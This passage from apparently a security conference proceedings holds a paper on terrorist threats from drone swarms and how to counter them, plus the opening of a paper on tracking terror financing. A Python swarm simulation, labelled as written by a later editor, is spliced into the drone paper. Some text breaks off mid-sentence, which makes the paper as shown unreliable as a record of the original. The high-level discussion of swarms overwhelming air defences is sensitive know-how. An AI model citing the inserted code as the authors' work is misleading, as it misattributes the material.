Barnard-Wills, D. & Ashenden, D., Security Virtual Space: Cyberwar, Cyberterror and Risk. Space and Culture.
Bobbitt, P., 2008. Terror and consent: the wars for the twenty-first century, London: Allen Lane.
Buzan, B., Waever, O. & de Wilde, J., 1998. Security: A New Framework for Analysis, London: Lynne Rienner.
Coker, C., 2009. War in an age of risk, Cambridge: Polity.
Cox, R., 1981. Social Forces, States and World Orders: Beyond International Relations Theory. Millennium: Journal of International Studies, (10), 126-155.
FBI National Press Office, 2011. FBI — Search Warrants Executed in the United States as Part of Ongoing Cyber Investigation. Available at: http://www.fbi.gov/news/pressrel/press-releases/warrants_012711 [Accessed January 28, 2011].
Fierke, K., 2007. Critical approaches to international security, Cambridge: Polity.
Jackson, R., 2005. Writing the war on terrorism: language, politics and counter-terrorism, Manchester: Manchester University Press.
Keane, B., 2011. Anonymous arrests shine a light on some (much) bigger issues – The Stump. Crikey.com. Available at: http://blogs.crikey.com.au/thestump/2011/01/30/anonymous-arrests-shine-a-light-on-some-much-biggerissues/ [Accessed January 31, 2011].
Laclau, E., 2005. On populist reason, London; New York: Verso.
Munroe, I., 2005. Information Warfare in Business: Strategies of Control and Resistance in the Network Society, London: Routledge.
Nissenbaum, H., 2005. Where Computer Security Meets National Security. Ethics and Information Technology, 7(2), 61-73.
Nye, J., 2010. Cyber Power, Harvard: Belfer Center for Science and International Affairs.
Ottis, R., 2010a. From Pitchforks to Laptops: volunteers in Cyber Conflicts. In Conference on Cyber Conflict Proceedings 2010. Tallinn, Estonia: CCD COE Publications, pp. 97-109. Available at: http://www.ccdcoe.org/articles/2010/Ottis_FromPitchforks.pdf.
Ottis, R., 2010b. Proactive Defense Tactics Against On-Line Cyber Militia, Cooperative Cyber Defence Centre of Excellence.
PayPal, 2010. PayPal statement regarding WikiLeaks. Available at: https://www.thepaypalblog.com/2010/12/paypalstatement-regarding-wikileaks/ [Accessed February 2, 2011].
Peoples, C. & Vaughan-Williams, N., 2009. Critical security studies: an introduction, London: Routledge.
Project Grey Goose, 2008. Russia/Georgia Cyber War - Findings and Analysis. Available at: http://www.scribd.com/doc/6967393/Project-Grey-Goose-Phase-I-Report.
The Guardian, 2011. Police arrest five over Anonymous WikiLeaks attacks. The Guardian. Available at: http://www.guardian.co.uk/technology/2011/jan/27/anonymous-hacking?INTCMP=SRCH [Accessed January 28, 2011].
Woodfin, R. & Zarate, O., 2004. Introducing Marxism, Royston: Icon.
Zukerman, E. et al., 2010. Distributed Denial of Service Attacks Against Independent Media and Human Rights Sites, The Berkman Center for Internet & Society at Harvard University. Available at: http://cyber.law.harvard.edu/sites/cyber.law.harvard.edu/files/2010_DDoS_Attacks_Human_Rights_and_Media.pdf [Accessed January 28, 2011].
Potential Threats of UAS Swarms and the Countermeasure’s Need
Laurent Beaudoin, Antoine Gademer, Loica Avanthey, Vincent Germain and Vincent Vittori
ESIEA, ATIS Dept., Paris, France
beaudoin@esiea.fr
gademer@esiea.fr
Abstract: The rising capabilities and growing accessibility of recent Unmanned Aerial Systems (UAS) widen the risk that a terrorist attack succeeds against current aerial defence systems. We first examine the complexity of the threats, from a single unmanned vehicle to a team of unmanned vehicles and finally to a swarm of unmanned vehicles (and any combination of these three). Then, from an operational point of view, we show that early detection of danger (a critical stage in the development of counter-attacks) has become very difficult because small unmanned vehicles like UASs have precisely the ability to take off directly within the sphere of attack. The next stage, equally critical, consists in elaborating the response that best fits the attack. We distinguish three general categories of active and passive countermeasures: destruction, incapacitation and jamming of the enemy UASs. We then study several possible countermeasures appropriate to the type of attack (enemy’s formation: isolated drone, team, swarm; weapon type: bomb, kamikaze, bacteriological etc.). We first present countermeasures that are rather conventional (they usually come from air defence systems) and others specific to the UAS case. We finish with a case study in which we tackle the use of simplified physical models for calculating positions in real time in an optimized way in a UAS swarm under constraints.
Keywords: unmanned aerial system, swarms, countermeasure, terrorism
1. Introduction
We previously presented the risks posed by the use of a single micro-UAS by terrorist groups, given the current flaws in aerial defence systems (Beaudoin & Gademer, 2010). This scenario is nowadays more than conceivable considering the rising capabilities of recent UASs and their growing accessibility. This perspective thus opens new breaches, even more dangerous than the previous ones, and renders obsolete most of the existing solutions.
This article deals with the potential threats related to the use of micro-UASs, which weigh less than 5 kilograms, for terrorist purposes in two respects: the increasing level of automation of these systems and their new capacity for collaboration. In a second step, we discuss the current countermeasures to prevent or fight such situations. Then we widen the debate with a case study that includes the prospects offered by collaborative systems in terms of countermeasures.
2. Technological abilities for new threats
2.1 Unmanned Vehicle Systems (UVSs) and level of automation
Automated unmanned vehicles are robots of different sizes (Abatti et al., 2005), carrying no human on board, but designed to fulfil various types of missions known as the three "Ds" (Dull, Dirty or Dangerous). They can be remotely controlled, follow a predetermined plan, react to their environment, or even use a combination of the three. In the literature (Christ, 2007; Singer, 2009), robots are often discussed in terms of autonomy, and many autonomy scales can be found. But rather than autonomy (which is a bit anthropomorphic) we prefer to define an automation scale.
We distinguish several levels of automation:
Level 1: Slave (assisted piloting, disturbance compensation)
Level 2: Automated (maintains its orders and takes high-level orders)
Level 3: Automatic navigation (a priori mission plan)
Level 4: Response from contextual data (dodging) without human intervention
Level 5: Decision-maker (expert system) from contextual data (navigation in unknown environment, realization of complex missions, coordination)
Levels 1 and 2 require the intervention of a pilot during the mission and therefore a continuous communication link between the pilot and the UVS during the attack.
24
Laurent Beaudoin et al.
At level 3, the system is independent of the pilot and knows how to place itself in its environment. For this, it relies on passive sensors (AHRS, GPS, clock…) and blindly follows the mission plan that has been given to it beforehand. This requires a detailed knowledge of the place in which the mission will take place to make sure everything goes smoothly.
At level 4, the system has a minimum knowledge of its surrounding environment and can react to events, for example by performing collision avoidance. To do this it uses a number of active sensors (distance measurement, short-range communications, etc.), but an accurate mission plan established beforehand remains a fundamental element.
Level 5 introduces concepts of artificial intelligence and decision-making that require significant computing power. To take full advantage of these new features, many perceptive sensors are usually added, as well as a large storage capacity that allows the robot to make inferences from the state of its environment, both in space and time. These robots are able to carry out complex missions in unexplored environments, to interact with them in a meaningful way, or to reschedule an ongoing mission because of encountered events.
The higher the level of automation, the more the human cost and risk are minimized from the point of view of the attacker, and the greater the probability of an unexpected attack (because fewer staff are involved upstream and in the field). The impact on the financial cost is more complex to measure, because it is much more influenced by the material cost of the device (due to the payload and the number of sensors) than by the embedded intelligence (software part). In what follows, we apply the previous scale to micro-UASs. Given the current technological breakthroughs available at a lower cost, micro-UASs represent new threats. Moreover, the multiplication of supply depots all over the world makes it impossible to survey or to detect suspicious individuals or groups. If we look at what exists today on the market for micro-UASs (less than 5 kg category) and given what we have just described, we can distinguish three cases:
Levels 1 and 2, which are relatively common, with reasonable prices. We find material for flying model aircraft (
Isolated individuals
The most basic case is that of the isolated individual (Beaudoin & Gademer, 2010). The UAS can be piloted or autonomous and has a specific mission to perform. Small in size, easy to assemble, affordable to fly, some models can even carry a light payload. They have all the assets to be used for terrorist operations in the near future. However, if the pilot or the UAS is stopped, disabled or destroyed, the threat is removed.
A group of individuals
A group of UASs is composed of several isolated individuals, each with their own mission and without coordination. Their spheres of action do not necessarily lie in the same location, and each unit can be considered as the case described in the previous paragraph. But by increasing the number of individuals, we multiply the probability of a successful attack by trying to saturate the defence’s capabilities. The main advantage of the group is that it does not need any collaboration among the individuals and thus does not need advanced collaborative capacity.
Team of UASs
A team of UASs can be seen as a group in which all members are assigned specialized tasks and are usually coordinated by a chief. Team formation is particularly effective: the objectives are divided and each member can focus on achieving its task. With UASs at the third level (automatic navigation) of the automation scale, there is synchronized action but no possibility of updating the mission plan according to what happens in the field. The fourth level (without human intervention) gives reaction to the surroundings but may lead to a fatal loss of synchronization between the team members, which quickly leads to using UASs of the fifth level. At this stage, all members communicate with each other and the leader chooses what to do next. So the action is fast and has things in common with a commando operation.
The missions that a team can perform can be far more complex than those in the previous case.
The team's strength is also its weakness: the more highly specialized each member is, the more the destruction of a key element can jeopardize the whole mission (coordinator UAS, UAS with the lethal load, UAS dedicated to the collection of information...). Survival of team members is therefore critical and fundamental to the proper performance of the mission.
The enemy can also try to predict the behaviour of a team, to a certain extent, because it usually works following a logical reasoning, and so it is possible for him to act accordingly.
Swarm of UASs
A swarm, unlike a team, is made of a uniform mass of undifferentiated individuals (Clough, 2002). The robots forming a swarm are at least at the fourth level of the automation scale. The swarm has no “chief” or “organization”. Its efficiency is based on the emergent behaviours arising from the large number of individuals and their interactions, which is why they cannot be controlled and need to be automated. The intelligence is decentralized (Frantz, 2005): each individual interacts with the others on the basis of the same simple rules describing the reactions of individuals to their local environment (like a shoal of fish).
This decentralization, combined with the large number of individuals, makes the swarm a highly resistant form (Chaumette et al., 2010). If some individuals disappear, it will have little influence on the conduct of the mission. The resulting action is certainly less efficient, but the mission can still succeed. Similarly, the swarm is resistant to local disturbances or to the addition of new individuals into the system; only the overall behaviour is taken into account.
However, the behaviour of the swarm is based only on individuals' reactions, so it is not deterministic (Lamont, 2007, 2008). We can then only estimate a probability of success, even in a favourable situation, which is far removed from the optimal way a team works. The main strength of a swarm, its distributed intelligence and its lack of hierarchical bonds, is also its main weakness: its lack of a strategic global view.
Finally, the appearance of the swarm itself can fulfil another objective in psychological warfare. Indeed, it can inspire both fear and powerlessness in the collective unconscious, as for example in Hitchcock’s “The Birds”, or like the killer bees from South America, the ants in Indiana Jones, or clouds of grasshoppers.
3. The vulnerability of existing defence systems and countermeasures
3.1 Vulnerability of present defence systems to attacks by micro-UASs
In practice, defence systems can be viewed in simplified form as the achievement of two critical phases: detection and identification of the danger, and counteraction through an appropriate response while restricting collateral damage.
The traditional tools of detection used by air defence systems can be categorized into two families:
Active radar surveillance: they generate waves and use the rebound of the echoes on potential flying objects to locate them. From there, it is possible to estimate their distance, their speed of approach, the penetration vector, and even to have an idea about their trajectory (at least in the short term) and their size.
Monitoring by passive observation of the electromagnetic spectrum, either in the visible or thermal infrared, or by listening to the radio waves on the common communication channels.
In practice, the data fusion of multiple sensors allows noise and false alarms to be reduced as much as possible while maintaining reliability. Except in unusual cases, the bigger the device is, the easier it is to notice. Usually the defence systems are optimized to detect aircraft or missiles. Both move at a rather high altitude and reach substantial speeds during the approach stage towards the target.
The main problem posed by micro-UASs is that the approach stage can be practically non-existent, because their small size allows them to be launched into action very close to the target (Carnu, 2010; Miasnikov, 2005; Gademer, 2009, 2010, 2010a). This cancels the long-range defensive strategies and raises the problem of the reactivity of the decision line, a reactivity that has to be all the quicker the nearer we are to the target. Their slow flight at a very low altitude is an aggravating factor that increases the probability of non-detection. Moreover, their electric motors do not leave a thermal signature, which makes their detection extremely difficult.
Finally, the topography of the theatre of war can also be an additional factor of complexity, as in the case of an urban environment. Here, the sphere of attack is limited. Therefore the interception stage inevitably takes place near the target, so probably within the urban environment itself. Thus the risk of collateral damage is much higher.
3.2 Countermeasures against these new threats
Once the danger is detected, it is then necessary to determine, according to the context, the best adapted countermeasure. There are two big families of countermeasures (Mirkarimi et al., 2003; Haulman, 2003). The first family, the active one, tries to incapacitate or to destroy the threat in a direct way (systems of air-to-ground defence for example). The second, the passive one, tries to protect from the danger in an indirect way (physical protection around the target, the use of decoys organized by communication systems, or jamming of the aggressor's sensors, as will be detailed in the practical case part).
The first active countermeasures to fight against micro-UASs are inspired by classic anti-aircraft defences. However, if the latter have shown their ability on "classic" targets, their efficiency against smaller and more reactive targets is much more mixed, especially in urban zones with the public at risk. These methods are also difficult to apply against enemies attacking simultaneously on multiple fronts, even if we increase the ability of the defence system to react and push back its saturation limit. The team mode of operation should moreover allow operational strategies to be implemented (decoys, shields, rams) which complicate both the detection and the interception stages. The swarm, on the other hand, should be easier to detect globally because it is not easy to mask the arrival of a cloud of robot craft, but it should prove much tougher to neutralize.
The passive countermeasures based on the physical protection of the target (installation of nets for example) are last-resort solutions. However, within the context of attack by micro-UAS, these solutions can be effective because of the small size of the robots. The use of decoys supposes that we know a
priori the sensors used by the drone to make its kamikaze attack and how this information is used, particularly in the final phase. The jamming of communication would appear to be effective against drones of level 1 or 2, which require the control of a pilot. It can also prove interesting to perturb the inter-drone communication required for a team or a swarm. The jamming of the sensors (false GPS information, camera dazzling, magnetic disturbance of the heading sensor) can also be an effective approach, whatever the level of automation.
4. Case study of a UAS swarm
4.1 Operational context
As we have seen previously, there can be a high operational interest in locally jamming GPS coverage. But a loss of the signal can easily be detected by the attacker, who can then activate a ploy such as estimating the course and the ground speed and using a timer in order to nonetheless reach the target area. More interesting is the case in which we only slightly modify the GPS signal to give false positions to the attackers in order to lure them into a chosen area. For the attacker, this strategy of defence is much more difficult to detect. In every case, this strategy can be complicated to apply over an area with fixed facilities, and even more so if the perimeter of the area to protect is mobile. A possible solution could be to use a swarm of UASs, each of them having a (possibly mobile) local jamming action. In this hypothesis, we use the swarm in a defensive role. As for the aggressor, a solution could be to perform a kamikaze attack in order to create a breach in the defence system in position. In the next section, we show an example of an innovative demonstrator to test scenarios of swarm-based attack and defence in a given operational context.
4.2 Operational modelling of a swarm in defence
To keep operating, the swarm will have to respond to the suicide bomber attack. The manoeuvre that is least costly in human resources will be a dodge, avoiding contact with the bomber but also with the other UASs of the swarm. However, for the manoeuvre to be of operational interest, we will at the same time have to minimise the deformation of the network of the UAS swarm. Finally, to check the operational feasibility of these solutions, we want to be able to perform the associated calculations locally and almost instantly, which excludes conventional solutions such as those based on numerical modelling of virtual reality. To accommodate these constraints, we propose to develop a demonstrator adapting a physics library (Chipmunk) mainly used in video games on smartphones. This pragmatic approach lets us leverage for our problem all the improvements and developments made by the video game industry, whose resource constraints and computation times are close to ours. The problem then is to find how to model our problem with the range of tools available in the library. The modelling solution that we propose for the demonstrator is:
- Avoidance between UASs through a repulsive force like the Coulomb one, proportional to 1 / r², where r is the distance between the UASs.
- Minimising deformation of the mesh by linking each UAS to its neighbours in eight connections through restoring forces in the manner of a spring, where the stiffness coefficient and the length at rest reflect the physical reality (the UAS's reactivity and the inter-UAS distance respectively).
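To make the two rules above concrete, here is a small simulation written for this edit; it is not the paper's Chipmunk demonstrator nor any code from the authors. It places the defenders on a 5 x 5 grid, applies a Coulomb-like K_REP / r² repulsion between every pair of vehicles (the attacker included), ties each defender to its up-to-eight grid neighbours with springs whose rest length is the initial spacing, flies a ballistic kamikaze attacker straight through the mesh and reports how far the mesh deformed and how well it recovered. All constants (force strengths, damping, time step, the attacker's path, the force clamp) are assumptions chosen for this example; mesh deformation is measured as the largest change in any link length, which makes it independent of the swarm drifting or rotating as a whole.

```python
"""Toy swarm model: 1/r^2 repulsion between all UASs plus 8-neighbour springs.
Added example (pure Python, not the paper's Chipmunk demonstrator); every
constant below is an assumption for illustration."""
import math

K_REP = 0.3        # repulsion strength: force = K_REP / r**2 (assumed)
K_SPRING = 4.0     # spring stiffness, standing for UAS reactivity (assumed)
DAMPING = 0.9      # fraction of velocity kept per step: drag / control damping (assumed)
DT = 0.05          # integration step in seconds (assumed)
MAX_FORCE = 50.0   # clamp so the explicit integrator survives tiny r (assumed)


def dist(a, b):
    return math.hypot(a[0] - b[0], a[1] - b[1])


def grid_positions(n, spacing=1.0):
    """Defenders start on an n x n grid at the desired inter-UAS distance."""
    return [(i * spacing, j * spacing) for i in range(n) for j in range(n)]


def neighbour_links(n):
    """Index pairs of the 8-connected grid (orthogonal and diagonal neighbours)."""
    links = set()
    for i in range(n):
        for j in range(n):
            for di in (-1, 0, 1):
                for dj in (-1, 0, 1):
                    a, b = i + di, j + dj
                    if (di or dj) and 0 <= a < n and 0 <= b < n:
                        p, q = i * n + j, a * n + b
                        links.add((min(p, q), max(p, q)))
    return sorted(links)


def repulsion(on, frm):
    """Coulomb-like push on `on` directed away from `frm`, clamped near r = 0."""
    r = dist(on, frm)
    if r < 1e-9:
        return (0.0, 0.0)
    mag = min(K_REP / (r * r), MAX_FORCE)
    return ((on[0] - frm[0]) / r * mag, (on[1] - frm[1]) / r * mag)


def step(pos, vel, links, rest, intruder):
    """One semi-implicit Euler step for the defenders; the intruder is ballistic."""
    forces = [[0.0, 0.0] for _ in pos]
    others = pos + ([intruder] if intruder is not None else [])
    for i, p in enumerate(pos):
        for j, q in enumerate(others):
            if j != i:
                fx, fy = repulsion(p, q)
                forces[i][0] += fx
                forces[i][1] += fy
    for (a, b), l0 in zip(links, rest):
        r = dist(pos[a], pos[b])
        mag = K_SPRING * (r - l0) / r          # Hooke's law, positive when stretched
        fx, fy = (pos[b][0] - pos[a][0]) * mag, (pos[b][1] - pos[a][1]) * mag
        forces[a][0] += fx; forces[a][1] += fy  # pulls a towards b ...
        forces[b][0] -= fx; forces[b][1] -= fy  # ... and b towards a
    new_pos, new_vel = [], []
    for p, v, f in zip(pos, vel, forces):
        vx = (v[0] + f[0] * DT) * DAMPING
        vy = (v[1] + f[1] * DT) * DAMPING
        new_vel.append((vx, vy))
        new_pos.append((p[0] + vx * DT, p[1] + vy * DT))
    return new_pos, new_vel


def mesh_deformation(pos, links, baseline):
    """Largest change of any link length versus the relaxed mesh."""
    return max(abs(dist(pos[a], pos[b]) - l) for (a, b), l in zip(links, baseline))


def simulate(n=5, relax_steps=600, attack_steps=100, recover_steps=400):
    pos = grid_positions(n)
    vel = [(0.0, 0.0)] * len(pos)
    links = neighbour_links(n)
    rest = [dist(pos[a], pos[b]) for a, b in links]   # rest length = initial spacing
    for _ in range(relax_steps):                        # let repulsion and springs settle
        pos, vel = step(pos, vel, links, rest, None)
    baseline = [dist(pos[a], pos[b]) for a, b in links]
    peak, min_to_intruder, min_between = 0.0, float("inf"), float("inf")
    start, end = (-3.0, 1.5), (7.0, 1.5)   # assumed straight kamikaze path between two rows
    for k in range(attack_steps + 1):
        t = k / attack_steps
        intruder = (start[0] + (end[0] - start[0]) * t, start[1] + (end[1] - start[1]) * t)
        pos, vel = step(pos, vel, links, rest, intruder)
        peak = max(peak, mesh_deformation(pos, links, baseline))
        min_to_intruder = min(min_to_intruder, min(dist(p, intruder) for p in pos))
        min_between = min(min_between, min(dist(pos[i], pos[j])
                                           for i in range(len(pos)) for j in range(i + 1, len(pos))))
    for _ in range(recover_steps):                      # attacker gone: springs restore the mesh
        pos, vel = step(pos, vel, links, rest, None)
    return {
        "peak_deformation": peak,
        "residual_deformation": mesh_deformation(pos, links, baseline),
        "min_distance_to_intruder": min_to_intruder,
        "min_distance_between_defenders": min_between,
    }


if __name__ == "__main__":
    for key, value in simulate().items():
        print(f"{key}: {value:.3f}")
```

The interesting knobs are K_REP (how hard a UAS dodges) against K_SPRING (how hard the mesh holds its shape): raising the first relative to the second buys a larger avoidance distance at the price of a larger and slower-recovering deformation, which is exactly the trade-off the two rules above set up.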
Figure 2 shows the physical network of the model. The big square is the attacking UAS, and the small ones are the defending UASs. The images show different positions of the attacking UAS and the re-organised response of the defending UASs.
Figure 2: Modelization
28
Laurent Beaudoin et al.
Figure 3 shows screenshots of the demonstrator, which reacts in near real time. The modelling approach shows the desired behaviour (optimised deformation of the swarm mesh and UAS-UAS avoidance achieved).
Figure 3: Demonstrator
From this demonstrator, we can draw two initial conclusions:
- The real-time constraints can be fully satisfied on architectures with limited computing power, and therefore be available in operation.
- The modelling shows that it is virtually impossible for the attacker to destroy or disrupt the defender's swarm effectively, unless it develops the ability to move very much faster than the defenders.
4.3 Collaboration among UASs in attack
From the perspective of the attacker, since a single attack is not enough, we have explored different scenarios of attack on the defensive swarm by another, offensive group, using the demonstrator described above.
Among the initial findings, it appears that an attack by a team of UASs that begins by encircling the defensive swarm to limit its operating space dramatically increases the effectiveness of a direct attack, but needs strong coordination to have maximum effect.
We can reverse the demonstration and say that a UAS swarm in attack would be practically unstoppable unless the defender demonstrates strong collaboration. If we describe a cloud of UASs as a graph, we think it will be possible to use graph matching techniques to distort an attacking swarm with remarkable efficiency over the defensive swarm.
We can conclude this part by saying that countering a swarm (in defence or attack) is very expensive, because high-level collaboration on the defending side seems necessary. Cost is an additional vulnerability factor for aerial security against a collaborative UAS attack.
5. Conclusion
We started this article by defining the new levels of automation and collaboration that current UAS technology can offer. We then presented how these new capacities could increase the potential menace of a terrorist attack using simple short-range flying robots, and why it seems necessary to start thinking about appropriate responses to this particular problem. In the last part we have shown with a simplified demonstrator that a few basic rules could give a UAS swarm strong resilience against kamikaze attacks, which can be used defensively to maintain local jamming over an area, or offensively to overwhelm the enemy. Against collaborative UASs, it seems that the only answer would be smarter and more numerous UASs. To conclude, our numerical approach has shown its value for estimating the behaviour and interactions of a UAS swarm. Nevertheless, these results should be consolidated by practical tests, which will need to integrate the physical constraints of the robots and their sensors, such as reaction time, measurement errors including positioning error, and processing and synchronisation capacities. Another way of extending this work could be 3D simulations, with a remarkable increase in complexity for both attack and defence strategies.
References
Abatti, J. M. and AL, A., “Small power: the role of micro and small UAVs in the future”, Research report, Air Command and Staff College, Air University, Maxwell Air Force Base, 2005.
Beaudoin, L. and Gademer, A., “Towards symmetrization of asymmetric air dominance: the potential key role playing by home-made low cost Unmanned Aerial Systems”, in European Conference on Information Warfare and Security, ECIW’10, 2010.
Carnu, F., “The new face of air oriented terrorism and air defence systems vulnerabilities”, in Romanian Military Thinking, p. 108-112, 2010.
Chaumette, S., Laplace, R., Mazel, C. and Godin, A., “Secure cooperative ad hoc applications within UAV fleets position paper”, in Military Communications Conference, MILCOM 2009, IEEE, p. 1-7, 2009.
Chipmunk Game Dynamics, http://code.google.com/p/chipmunk-physics/
Clough, B. T., “UAV swarming? So what are those swarms, what are the implications, and how do we handle them?”, 2002.
Christ, R. D. and Wernli Sr, R. L., “The ROV Manual: a user guide for observation-class remotely operated vehicles”, Butterworth-Heinemann, Chapter 2: ROV Design, 2007.
Frantz, N. R., “Swarm Intelligence for Autonomous UAV Control”, Thesis, Naval Postgraduate School, Dept. of Electrical and Computer Engineering, 2005.
Gademer, A., Vittori, V. and Beaudoin, L., “From light to ultralight UAV”, in International Conference Unmanned Aircrafts System Forum, Eurosatory, 2010.
Gademer, A., “Réalité Terrain Étendue : une nouvelle approche pour l’extraction de paramètres de surface biophysiques et géophysiques à l’échelle des individus”, PhD Thesis, ParisEst University, 2010a.
Gademer, A., Chéron, C., Monat, S., Mainfroy, F. and Beaudoin, L., “A low cost spying quadrotor for global security applications using hacked digital cameras”, in DEFCON 17, 2009.
Haulman, D. L., “US unmanned aerial vehicles in combat, 1991-2003”, Research Paper, Air Force Historical Research Agency, Maxwell Air Force Base, 2003.
Lamont, G. B., “UAV Swarm Mission Planning Development Using Evolutionary Algorithms - Part I”, Research Paper, NATO, SCI-195, 2007.
Lamont, G. B., “UAV Swarm Mission Planning Development Using Evolutionary Algorithms and Parallel Simulation - Part II”, Research Paper, NATO, SCI-195, 2008.
Miasnikov, E., “Threat of Terrorism Using Unmanned Aerial Vehicles: Technical Aspects”, Technical Report, Center for Arms Control, Energy, and Environmental Studies, Moscow Institute of Physics and Technology, 2005.
Mirkarimi, D. B. and Pericak, C., “Countering the tactical UAV Threat”, Armor, vol. 112, no. 1, p. 43, 2003.
Valenti, M., Bethke, B., How, J. P., de Farias, D. P. and Vian, J., “Embedding health management into mission tasking for UAV teams”, in American Control Conference, ACC’07, p. 5777-5783, 2007.
Valenti, M., Dale, D., How, J. and Vian, J., “Mission health management for 24/7 persistent surveillance operations”, in AIAA Guidance, Navigation and Control Conference and Exhibit, 2007.
Singer, P. W., “Wired for War: the robotics revolution and conflict in the 21st century”, Chapter 3: Robotics for dummies, The Penguin Press, New York, 2009.
Developing Intelligence in the Field of Financing Terror - an Analytical Model of Anti-Terror Inter Agency and Cross Border Cooperation: The Security of Financial Systems Dimension
Alexander Bligh
Ariel University Center, Ariel, Israel
ab1061@columbia.edu
Abstract: This paper presents and analyzes the major challenges facing counter-terrorism players and proposes some ways to counter the always-present intelligence deficits in the field of financing terrorism and the threat of financing terrorism. However, this is in no way a recipe. The proposals introduced here are intended to raise awareness and to suggest new approaches, and thus encourage fresh thinking on old issues, in the hope that this will shed light on a narrow angle of the free world’s war on terror. This paper is based on the paper "Security through Science", presented at the 2005 NATO sponsored “Advanced Research Workshop” at the University of Konstanz, Germany, and later published (Bligh 2006). I have developed this model for a variety of uses, the issue of “dirty money” among them. It attempts to map the needs and major obstacles, and to offer possible solutions based on the integration of an analytical model with the most advanced technological hardware and software available to national entities at the present time. The approach adopted here integrates an existing computerized platform, used by the U.S. and NATO, with the SWIFT system, along with an original analytical model, proposed here, that can be used by all system members. The system will operate along lines similar to current agreements governing the global and national use of credit cards and ATMs. Nevertheless, it is worth noting that the conflict between privacy and security is particularly acute here because the possession of financial assets is one of the most sensitive types of personal data possible. The paper is divided into the following sections: the current map of terror and intelligence as related to the financial dimension; the main challenges and a possible approach to a partial solution; and a proposed methodology for developing intelligence.
Keywords: terrorism, security, intelligence, banking, money laundering
1. Introduction
Unlike weapons that can be paraded and that sometimes shoot, the transfer of funds is always veiled in secrecy. State budgets, and certainly those of underground organizations, usually hold the secrets of current and future strategy. In fact, they can tell volumes about the overt and covert sources of financing that enable, or prevent, the carrying out of activities; they carry the secret life of every organization. Moreover, handling weapons is probably a less sophisticated undertaking than the effective handling of money. A money expert must make sure that it will bear fruit on the one hand, yet not attract the attention of any law enforcement agency. The expertise necessary for the handling of funds leads to the inescapable fact that only a handful of experts can handle the financing of terrorist organizations. Beyond their financial routine, they must invest extra care lest they be accused of embezzling funds and forced to face retribution. Clearly, since there is no need to present balance sheets to very many authorities, the temptation to misuse funds is greater than in public bodies. Thus, collecting intelligence on the financial matters of organized crime (O/C) and terrorist organizations may be hindered by several constraints:
- The difficulty in infiltrating the small ring of experts who deal with terrorist or O/C money, as well as the (even) smaller number of financial counter-terrorism experts capable of tracking these organizations' budgets.
- The typically legitimate fundraising of religious organizations and the natural concern of governments about violating the religious freedoms of innocent citizens.
- The tendency of intelligence officers to only take into consideration tangible materials rather than examining organizations’ balance sheets.
Consequently, one of the major, yet understudied, dimensions of the analysis of terrorist activity, and the ways to counter it, is the financial dimension. Like any other activity, legal or illegal, a terrorist has to put a price tag on achieving his goals: from rewarding the lowliest field operative to the purchase of raw materials for producing nuclear devices. Therefore, it is only logical to assume that every terrorist action works within a budget, which is based on several sources of income and an itemized list of expenses. Since many of these organizations operate outside the realm of their sponsoring countries, the financial dimension also involves the issue of transferring funds while evading scrutiny.
31
Alexander Bligh<br />
The following paper presents and analyzes the major challenges facing counter-terrorism players, and proposes several ways to counter elements of this threat. However, this is in no way a recipe. The proposals introduced here are intended to raise awareness and to suggest new approaches, and thus encourage fresh thinking on old issues, in the hope that this will shed light on a narrow angle of the free world’s war on terror.
This paper is based on the paper "Security through Science", presented at the 2005 NATO sponsored “Advanced Research Workshop” at the University of Konstanz, Germany, and later published (Bligh 2006). I have developed this model for a variety of uses, the issue of “dirty money” among them. It attempts to map the needs and major obstacles, and offers possible solutions based on the integration of an analytical model with the most advanced technological hardware and software available to national entities at the present time.
The approach adopted here integrates an existing computerized platform, used by the U.S. and NATO, with the SWIFT system, along with an original analytical model, proposed here, that can be used by all system members. The system will operate along lines similar to current agreements governing credit cards and ATMs. Nevertheless, it is worth noting that the conflict between privacy and security is particularly acute here because the possession of financial assets is one of the most sensitive types of personal data possible (Ballard 2006).
The paper is divided into the following sections: the current map of terror and intelligence as related to the financial dimension; the main challenges and a possible approach to a partial solution; and a proposed methodology for developing intelligence.
2. The current map
Three major, and apparently unrelated, processes have occurred since the beginning of the 21st century:
- The dramatic development of never-before dreamed of computing capabilities, and consequently the increased use of sophisticated communications systems at rapidly decreasing costs.
- The wave of terror against major centres in the West and elsewhere (New York, Moscow, various parts of Iraq, Madrid, London, Asia, the Indian sub-continent, the Sinai, various parts of Israel, etc.).
- The closing of the ranks among a growing number of countries against this wave of terror.
The money transfer market is divided into two distinct branches: a formal, and thus traceable, branch, which uses systems like SWIFT, and an informal one, using hawala type systems (Razavy 2005). The formal field is usually used by innocent bodies (Bloodgood 2011), major firms, and numerous individuals. These lawful channels are threatened with misuse by malicious parties. This level is operated by a number of firms that adhere to pre-established rules and function in line with the anti-laundering laws of the countries that take part in the system. Many large firms have been granted direct access to SWIFT since 2009, while using one standardized security protocol (Global Finance 2011). At least one of the firms on the formal tier stated that major money transfers originate in the U.S., Western Europe and the Middle East (Fair Disclosure Wire 2007), and that the major recipients are located in the Asian Pacific region, the Indian sub-continent, and Africa. It also reported a major increase in these transfers between 2002 and 2006. These characteristics clearly reflect the current global foreign labour map: mostly Muslims from Turkey, Pakistan, the Philippines, Sri Lanka and various African countries who find their way to France, Germany, the oil rich countries in the Gulf and, obviously, the USA. The Chinese factor is not fully apparent yet but it will undoubtedly become much more significant in the years to come. For many of these receiving countries, remittances originating in foreign countries are the major source of foreign currency that keeps their economies functioning. The known money transfers in this market equal roughly 25-30% of the money transfers taking place in a given year. The total amount of transfers in 2005 was estimated at $269 billion (Fair Disclosure Wire 2007), which implies that the overall transfers of that year amounted to around $1 trillion. About 70-75% of this enormous sum is unaccounted for, in terms of its sources and/or intended recipients. In 2010-2011, more than one half of the remittances entering Bangladesh arrived there using informal channels (Financial Express 2011), a fact that does not necessarily imply that these funds were used for illegal purposes. An official U.S. publication, quoting international financial institutions, estimated annual hawala transfers at approximately $2 trillion, representing 2 percent of all international financial transactions (Olson 2007). These numbers seem out of context, especially considering that they are supposedly updated only up to 1995!
